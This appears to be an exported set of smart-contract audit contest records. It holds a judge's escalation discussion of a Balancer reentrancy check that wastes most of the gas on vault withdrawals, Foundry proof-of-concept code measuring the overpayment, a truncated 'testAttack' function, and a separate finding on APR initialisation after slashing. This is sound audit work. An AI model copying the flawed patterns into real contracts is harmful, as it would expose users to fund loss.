This causes the contract to burn up 63/64 bits of gas in a single check. If there are lots of operations after this call, the call can revert due to running out of gas. This can lead to a DOS of the contract.\\nCurrent opinion is to reject escalation and keep issue medium severity.\\nJeffCX\\nPutting a limit on the gas is not a task for the protocol\\nsir, please read the report again, the flawed logic in the code charge user 100x gas in every transaction in every withdrawal\\nin a single transaction, the cost burnt can by minimal\\nidk how do state it more clearly, emm if you put money in the bank, you expect to pay 1 USD for withdrawal transaction fee, but every time you have to pay 100 USD withdrawal fee because of the bug\\nthis cause loss of fund for every user in every transaction for not only you but every user...\\nEvert0x\\n@JeffCX what are the exact numbers on the withdrawal costs? E.g. if I want to withdraw $10k, how much gas can I expect to pay? If this is a significant amount I can see the argument for\\nHow to identify a high issue: Definite loss of funds without limiting external conditions.\\nBut it's not clear how much this will be assuming current mainnet conditions.\\nJeffCX\\nI write a simpe POC\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport "forge-std/Test.sol";\\nimport "forge-std/console.sol";\\n\\nimport "@openzeppelin/contracts/token/ERC20/ERC20.sol";\\n\\ncontract MockERC20 is ERC20 {\\n constructor()ERC20("MyToken", "MTK")\\n {}\\n\\n function mint(address to, uint256 amount) public {\\n _mint(to, amount);\\n }\\n}\\n\\ninterface ICheckRetrancy {\\n function checkRentrancy() external;\\n}\\n\\ncontract RentrancyCheck {\\n\\n\\n uint256 state = 10;\\n\\n function checkRentrancy() external {\\n address(this).staticcall(abi.encodeWithSignature("hihi()"));\\n }\\n\\n function hihi() public {\\n state = 11;\\n }\\n\\n}\\n\\ncontract Vault {\\n\\n address balancerAddr;\\n bool checkRentrancy;\\n\\n constructor(bool _checkRentrancy, address _balancerAddr) {\\n checkRentrancy = _checkRentrancy;\\n balancerAddr = _balancerAddr;\\n }\\n\\n function toggleCheck(bool _state) public {\\n checkRentrancy = _state;\\n }\\n\\n function withdraw(address token, uint256 amount) public {\\n\\n if(checkRentrancy) {\\n ICheckRetrancy(balancerAddr).checkRentrancy();\\n }\\n\\n IERC20(token).transfer(msg.sender, amount);\\n \\n }\\n\\n}\\n\\n\\ncontract CounterTest is Test {\\n\\n using stdStorage for StdStorage;\\n StdStorage stdlib;\\n\\n MockERC20 token;\\n Vault vault;\\n RentrancyCheck rentrancyCheck;\\n\\n address user = vm.addr(5201314);\\n\\n function setUp() public {\\n \\n token = new MockERC20();\\n rentrancyCheck = new RentrancyCheck();\\n vault = new Vault(false, address(rentrancyCheck));\\n token.mint(address(vault), 100000000 ether);\\n\\n vm.deal(user, 100 ether);\\n \\n // vault.toggleCheck(true);\\n\\n }\\n\\n function testPOC() public {\\n\\n uint256 gas = gasleft();\\n uint256 amount = 100 ether;\\n vault.withdraw(address(token), amount);\\n console.log(gas - gasleft());\\n\\n }\\n\\n}\\n```\\n\\nthe call is\\n```\\nif check reentrancy flag is true\\n\\nuser withdraw -> \\ncheck reentrancy staticall revert and consume most of the gas \\n-> withdraw completed\\n```\\n\\nor\\n```\\nif check reentrancy flag is false\\n\\nuser withdraw ->\\n-> withdraw completed\\n```\\n\\nnote first we do not check the reentrancy\\n```\\n// vault.toggleCheck(true);\\n```\\n\\nwe run\\nthe gas cost is 42335\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 45438)\\nLogs:\\n 42335\\n```\\n\\nthen we uncomment the vault.toggleCheck(true) and check the reentrancy that revert in staticcall\\n```\\nvault.toggleCheck(true);\\n```\\n\\nwe run the same test again, this is the output, as we can see the gas cost surge\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 9554791)\\nLogs:\\n 9551688\\n```\\n\\nthen we can use this python scirpt to estimate how much gas is overpaid as lost of fund\\n```\\nregular = 42313\\n\\noverpaid = 9551666\\n\\n\\ncost = 0.000000045 * (overpaid - regular);\\n\\nprint(cost)\\n```\\n\\nthe cost is\\n```\\n0.427920885 ETH\\n```\\n\\nin a single withdraw, assume user lost 0.427 ETH,\\nif 500 user withdraw 20 times each and the total number of transaction is 10000\\nthe lose on gas is 10000 * 0.427 ETH\\nJeffCX\\nnote that the more gas limit user set, the more fund user lose in gas\\nbut we are interested in what the lowest amount of gas limit user that user can set the pay for withdrawal transaction\\nI did some fuzzing\\nthat number is 1800000 unit of gas\\nthe command to run the test is\\nsetting gas limit lower than 1800000 unit of gas is likely to revert in out of gas\\nunder this setting, the overpaid transaction cost is 1730089\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 1733192)\\nLogs:\\n 1730089\\n```\\n\\nin other words,\\nin each withdrawal for every user, user can lose 0.073 ETH, (1730089 uint of gas * 45 gwei -> 0.000000045 ETH)\\nassume there are 1000 user, each withdraw 10 times, they make 1000 * 10 = 100_00 transaction\\nso the total lost is 100_00 * 0.07 = 700 ETH\\nin reality the gas is more than that because user may use more than 1800000 unit of gas to finalize the withdrawal transaction\\nEvert0x\\n@JeffCX thanks for putting in the effort to make this estimation.\\nBut as far as I can see, your estimation doesn't use the actual contracts in scope. But maybe that's irrelevant to make your point.\\nThis seems like the key sentence\\nin each withdrawal for every user, user can lose 0.073 ETH,\\nThis is an extra $100-$150 dollars per withdrawal action.\\nThis is not a very significant amount in my opinion. I assume an optimized withdrawal transaction will cost between $20-$50. So the difference is not as big.\\nJeffCX\\nSir, I don't think the method A and method B example applies in the codebase and in this issue\\nthere is only one method for user to withdraw share from the vault\\nI can add more detail to explain how this impact withdraw using top-down approach\\nUser can withdraw by calling withdraw in LMPVault.sol and triggers _withdraw\\nthe _withdraw calls the method _calcUserWithdrawSharesToBurn\\nthis calls LMPDebt._calcUserWithdrawSharesToBurn\\nwe need to know the debt value by calling destVault.debtValue\\nthis calls this line of code\\nthis calls the oracle code\\n`uint256 price = _systemRegistry.rootPriceOracle().getPriceInEth(_underlying);`\\nthen if the dest vault is the balancer vault, balancer reetrancy check is triggered to waste 63 / 64 waste in oracle code\\nso there is no function A and function B call\\nas long as user can withdraw and wants to withdraw share from balancer vault, 100x gas overpayment is required\\nthe POC is a simplified flow of this\\nit is ok to disagree sir:)\\nEvert0x\\nResult: Medium Has Duplicates\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nJEFFCX: rejected
```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint("Gas before price1", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint("price1", price1);\\n emit log_named_uint("Gas after price1 ", gasleft());\\n }\\n```\\n
Slashing during `LSTCalculatorBase.sol` deployment can show bad apr for months
medium
The contract `LSTCalculatorBase.sol` has some functions to calculate the rough APR expected from a liquid staking token. The contract is first deployed, and the first snapshot is taken after `APR_FILTER_INIT_INTERVAL_IN_SEC`, which is 9 days. It then calculates the APR between the deployment and this first snapshot, and uses that to initialize the APR value. It uses the function `calculateAnnualizedChangeMinZero` to do this calculation.\\nThe issue is that the function `calculateAnnualizedChangeMinZero` has a floor of 0. So if the backing of the LST decreases over that 9 days due to a slashing event in that interval, this function will return 0, and the initial APR and `baseApr` will be set to 0.\\nThe calculator is designed to update the APR at regular intervals of 3 days. However, the new apr is given a weight of 10% and the older apr is given a weight of 90% as seen below.\\n```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n\\nAnd alpha is hardcoded to 0.1. So if the initial APR starts at 0 due to a slashing event in the initial 9 day period, a large number of updates will be required to bring the APR up to the correct value.\\nAssuming the correct APR of 6%, and an initial APR of 0%, we can calculate that it takes upto 28 updates to reflect close the correct APR. This transaltes to 84 days. So the wrong APR cann be shown for upto 3 months. Tha protocol uses these APR values to justify the allocation to the various protocols. Thus a wrong APR for months would mean the protocol would sub optimally allocate funds for months, losing potential yield.
It is recommended to initialize the APR with a specified value, rather than calculate it over the initial 9 days. 9 day window is not good enough to get an accurate APR, and can be easily manipulated by a slashing event.
The protocol can underperform for months due to slashing events messing up APR calculations close to deployment date.
```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n